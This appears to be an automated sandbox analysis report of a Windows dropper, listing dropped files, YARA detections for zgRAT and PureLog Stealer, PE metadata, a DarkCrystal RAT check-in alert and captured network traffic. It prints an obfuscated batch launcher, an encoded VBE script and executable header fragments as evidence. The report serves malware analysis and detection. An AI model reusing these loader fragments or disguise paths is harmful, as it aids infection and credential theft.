C:\Windows\Registration\886983d96e3d3e

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with very long lines (376), with no line terminators
Category:	dropped
Size (bytes):	376
Entropy (8bit):	5.83818652477556
Encrypted:	false
SSDEEP:	6:6RM+8BRKT5tx3zyyBPj99ZqbzICFUyrc9hOM0jWWHnQwBuWbCkrPHfh:6Xg0n3zykj9Tq4krChOMBcnXuObHfh
MD5:	27B73D38DC1AE4522A2BCBA29672C00A
SHA1:	AE7E7CFBAA78E9765E85359E3F91A8A6D1053C95
SHA-256:	68963C9181BF691AB65740192F4BD5AE60F4350D10764A35D21E8098198C4185
SHA-512:	F32F5CC57095BC3A86A510F153E236C7544C417B261296AE254DF89E6D44688755AE89CC74234FBB8CBFA790FF7FE7B62F1D1DC3BE7771A43B30B2305069E75B
Malicious:	false
Preview:	8mDsPgPleXuJQOyovFDlMDXxvYwdcf1fWc7YfU6ZexAw0MCgguSvA9K4PP70twJ9gOwyQaJaIoHZCk7jWQ7sNFfWSCIPXFqsoBQmZNPFk1nV2u2oSYecybvatZgNR4DC7ZvAUVJIB1HVbJehKd69lN3NQz39rBxqykYc91U7OVb7Ta8j59Dy7EbufiuecJb9Dbh1vBhSJ9uQw63z0TEs79stJo6bH0fE3c322Hy3bvp8UK7jo4nIFtBEsxrHEGKSdpWUDA7sfLRMUuZ8qXwNMW9JazKEaqyUkWeoyngn74n4czt7YsbrU7GGpM3N02SyW6l8PuKC0IPRtFrlGNqrPG9nPX8ltSxEmyhfNurniY1MrzXjfSHnMljQ

C:\Windows\Registration\csrss.exe

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1930240
Entropy (8bit):	7.539435467100607
Encrypted:	false
SSDEEP:	24576:Yp1FzIjET5FFt23t/DSKREhl9PKSPomcL+BMjb+L7uhDLSFDAVB84JeRdLxhLNGq:YBzHgt/DshPCLL+B0LSe853h5GCV
MD5:	31594886C067C61C60A04365C0E2A58C
SHA1:	C2E398B5570DA49B08050CCD48381F96E8368F28
SHA-256:	7309289E7D27AAECDFA582BDBD748DB3EC445B317022B4B842C1CFB91C0B5D84
SHA-512:	56AE556094784B60A2B15EE21AF06E5E34FC60F921BEF406C2AD5254BAE36F6736CF4CF7E589B144E5BB36EDB9863D51F1C65447B7CE35A5F519A67CBAACEC33
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Registration\csrss.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Registration\csrss.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.................l............... ........@.. ....................................@.................................P...K....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B........................H...........................$...........................................0..........(.... ........8........E........)...M...q...8....(.... ....~w...{....:....& ....8....(.... ....~w...{h...9....& ....8....(.... ....~w...{....:....& ....8z......0.......... ........8........E........=...........u...i...8....~....9.... ....8....8V... ....~w...{....:....& ....8........~....(X...~....(\... ....?.... ....8z...r...ps....z~....(P... .... .... ....s....~....(T....... ....~w...{....:

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\portintosvc\11aaa3d75384f9

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	ASCII text, with very long lines (918), with no line terminators
Category:	dropped
Size (bytes):	918
Entropy (8bit):	5.908787066653431
Encrypted:	false
SSDEEP:	24:R/LaSxyv7HVUAaFiGCKl9MHL4qC57xmj9lH:M/HeJijKKL4qCR89lH
MD5:	72C653A74A7EF0571418FF15F29DA660
SHA1:	B76BDA4E2CEF0E581C21927E8B5784285D489B33
SHA-256:	441ADA080450A79F5C603353668AED04985DC2627DD303FB5BCEB2D96E64A4CB
SHA-512:	AA8BA64B5C0C19E89866EC59D54BBB2F90D09AE7A7C424B502BE173FE130AB3A25FF9412CB553DA871FE23FFEA4848707B28C310FE38F9BDB7277264EDD7C588
Malicious:	false
Preview:	pbpLfYoSfNI8FW5WnN2u8AQc4qC8itnnFuDGa94wSM8jm8vqoSHVjv6oKMRzWquwjf2VTz6oTFbvCq054WUQlSDUyY5NsFamcM9GFaXyVdBeTKmeWV49WeKRcig44s5OpzTzrtze9f4IQjAowa1WKaQ7Brnh3c3nhxye0wxmfaA0kCB3h2Hd1jDPjVy9FSlgmQkcugxAnO0uaZX9qu9AVZv8tj5f8xgNydOTbiIBFH0msTyJ7ySVSkLMemsLlSBzsn56LEhIm85NjJPauvhJfL5OSCyzz6awFA4FX283QJtTo7mVWSbzu2UgrrnJPsTpiIIjOKD1wo3WcljUZcchfkBNqXXqOzni0DufzDGMOjCG88EFHTtxPwJ8G430wXn7AVfY1DfWVQS5h5OsTRi5F0SD4wY4JQZ16FGncqODxXb9dNaLqLhfyr1JDbdEplMF1b9cylPmDfIsZTkqWNN8s3DON6kAMJYLKVHCO7WF54cSjJut1xscXNX7XuP2APZ3H6hDLhbY0IDxbupEM0IZb6y68JoeseEpfiLnlqiUVUmOKjgnEKqKHAbKIkFC27pVEXS2iCdfSyDHUjwZnBZhy3ieGAeAkfbYoQKwQnECrK2S7U0iyqY0iHhKzyvihc4wXpcDY9IA7W0nBPhwK6L4Hk0gt97c1gfOPF5S2xKziY3LR3IjQ9XlRApwy5UYCpJa1lX6UP3WvWVsqoPz1XL1I47PaId6cvw3PcUqfMPBGBz4o7GKqehodRS7nIfLv64AjccNUjToHKvHEDkdCTQ7NIZ7KWCXqEQJGyVLe2zHL3gTgL2khCIcq6xbDeD7g57D4mAPsZ8KdJwUlGb9ec0n5xcKB3I9y2kP5dZ4Km2ID78hJc06DEdEFUHGJzNyQ9WljhYHrhy1jsj8z5AjDL5uYf

C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat

Download File

Process:	C:\Users\user\Desktop\Vqzx4PFehn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	93
Entropy (8bit):	5.199059988709206
Encrypted:	false
SSDEEP:	3:0NkWPrNQT26pHo+XqLRKWTeNQ4S33:0dPZk26p7gRbz33
MD5:	0BE982804B016289CB81417601B9EB58
SHA1:	AFE7C33411A4287B61A9A44EA5C385A37DD9DA3C
SHA-256:	BAC34DFF1783EF418218D2EA5EB4A26F90AC684AA170F0CE4ED53A4FCC670E86
SHA-512:	BBC734D9608859DDA9719D2416B1A25C777CAA94BC91214A5130C032EBB82FD08E41109B153CE03E71969043BB0DE184C28974820575FE94261448436D34CD77
Malicious:	false
Preview:	%thAYJLGINhDd%%EhFZTSYCEYTXKl%..%pAgYeasEtKLoVG%"C:\portintosvc/driverInto.exe"%wxpnDuahJnvW%

C:\portintosvc\X5ZTZfC.vbe

Download File

Process:	C:\Users\user\Desktop\Vqzx4PFehn.exe
File Type:	data
Category:	dropped
Size (bytes):	227
Entropy (8bit):	5.940769499330378
Encrypted:	false
SSDEEP:	6:GavwqK+NkLzWbHOurFnBaORbM5nC0hcq6VlNin:Ga2MCzWLOuhBaORbQC0hcq6VK
MD5:	808F7BE1B688DFE0B79177049D1E221C
SHA1:	7A5230E286A0E1CF1BBFFC00D835D020CCB3962F
SHA-256:	3C418F6B30335A6DC3B70240951DB4156AB448316CC75FA07EF593E16D9C2DA0
SHA-512:	A6D8E8C559F53DEDE4609B96C99E124605E7C5C20BFD715785D6E9399DAB6BA0FFAF360F0922E3641521A17D18FC2E33E99EE90E0E28976B831BDFFE112385D2
Malicious:	false
Preview:	#@~^ygAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFX!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z2KDDkxDWk-mJz.kHD3WU!;\\j.\|j75zZA1n%ov89yl1S}p0ZHh (lYES,!SP6C^/n2z8AAA==^#~@.

C:\portintosvc\driverInto.exe

Download File

Process:	C:\Users\user\Desktop\Vqzx4PFehn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1930240
Entropy (8bit):	7.539435467100607
Encrypted:	false
SSDEEP:	24576:Yp1FzIjET5FFt23t/DSKREhl9PKSPomcL+BMjb+L7uhDLSFDAVB84JeRdLxhLNGq:YBzHgt/DshPCLL+B0LSe853h5GCV
MD5:	31594886C067C61C60A04365C0E2A58C
SHA1:	C2E398B5570DA49B08050CCD48381F96E8368F28
SHA-256:	7309289E7D27AAECDFA582BDBD748DB3EC445B317022B4B842C1CFB91C0B5D84
SHA-512:	56AE556094784B60A2B15EE21AF06E5E34FC60F921BEF406C2AD5254BAE36F6736CF4CF7E589B144E5BB36EDB9863D51F1C65447B7CE35A5F519A67CBAACEC33
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\portintosvc\driverInto.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\portintosvc\driverInto.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 83% Antivirus: Virustotal, Detection: 65%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..f.................l............... ........@.. ....................................@.................................P...K....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B........................H...........................$...........................................0..........(.... ........8........E........)...M...q...8....(.... ....~w...{....:....& ....8....(.... ....~w...{h...9....& ....8....(.... ....~w...{....:....& ....8z......0.......... ........8........E........=...........u...i...8....~....9.... ....8....8V... ....~w...{....:....& ....8........~....(X...~....(\... ....?.... ....8z...r...ps....z~....(P... .... .... ....s....~....(T....... ....~w...{....:

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.626625764922207
Encrypted:	false
SSDEEP:	12:PuaUw5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:WfydUOAokItULVDv
MD5:	CC063BBD0415F114F2F785975020E794
SHA1:	5D2776521ED56154A943BCF7332B45F686CA4009
SHA-256:	A48AB381C6DFDE7AB57F1DBD2BA3EB1DD22F9D0889C37540A79AFBB89423EAB7
SHA-512:	BFEDABDB772C1C4823F6FE2A377B2FD02A995935B27B8BC60225412BE0A0856E2003105A0F58E124069D2B2732DC8CF4B10E7A9DF64CCF65AA94790A29872E78
Malicious:	false
Preview:	..Pinging 783875 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.910732223318245
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Vqzx4PFehn.exe
File size:	1'789'751 bytes
MD5:	1925339cab9e6a65f43c5f04321156e2
SHA1:	16fc99e39d5dd91b915da5ffb969f56597d54c06
SHA256:	fb2e3a0d29ae08e964de8bcc1cf986b3a6b928d13e14368cc31535236afd024e
SHA512:	36e3a20e9024183ee87a2885d883da5f8ded3f9d5b78aa3ce3fb6b21a86b8ff3af88229e77a15ee68f3df6c5e140f6e83e9558a00fc0d9dc49bd36c77b997816
SSDEEP:	49152:IBJ+5XdfyLwy6z4OTWtr4dOJ6taJlZHnfi0pu:yA7iXg4aWF4wko1Hfi04
TLSH:	87852302BAD19A70D623193306785B21797CBE202FB5CEDF63A46D5DC9354C0DB32BA6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FAFE8DB165Bh
jmp 00007FAFE8DB0F6Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FAFE8DA3DB7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FAFE8DB43FFh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FAFE8DB10FCh
push 0000000Ch
push esi
call 00007FAFE8DB06B9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FAFE8DA3D32h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FAFE8DB3EB9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FAFE8DB1078h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FAFE8DB3E9Ch
int3
jmp 00007FAFE8DB5937h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/29/24-01:02:33.169429	TCP	2048095	ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST)	49739	80	192.168.2.4	172.67.144.153

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 29, 2024 01:02:10.512908936 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:10.513025045 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:10.513154984 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:10.525999069 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:10.526037931 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:10.762672901 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:10.762789965 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:10.765712976 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:10.765734911 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:10.765965939 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:10.805179119 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:10.852118015 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.003928900 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.003995895 CEST	443	49732	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.004194975 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.010302067 CEST	49732	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.013392925 CEST	49734	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.013431072 CEST	443	49734	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.013686895 CEST	49734	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.013943911 CEST	49734	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.013957024 CEST	443	49734	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.238945007 CEST	443	49734	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.240854025 CEST	49734	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.240890026 CEST	443	49734	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.477096081 CEST	443	49734	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.477166891 CEST	443	49734	34.117.186.192	192.168.2.4
Apr 29, 2024 01:02:11.477271080 CEST	49734	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.477772951 CEST	49734	443	192.168.2.4	34.117.186.192
Apr 29, 2024 01:02:11.755757093 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:11.755855083 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:11.755942106 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:11.758920908 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:11.758965015 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.192421913 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.192497969 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.197285891 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.197299004 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.197516918 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.206094027 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.252123117 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.590958118 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.590998888 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.592417955 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.592427969 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.593803883 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.593825102 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.593904018 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.593909025 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.593931913 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.593940020 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.593980074 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.593986988 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594012976 CEST	49737	443	192.168.2.4	149.154.167.220
Apr 29, 2024 01:02:12.594023943 CEST	443	49737	149.154.167.220	192.168.2.4
Apr 29, 2024 01:02:12.594063044 CEST	49737	443	192.168.2.4	149.154.167.220
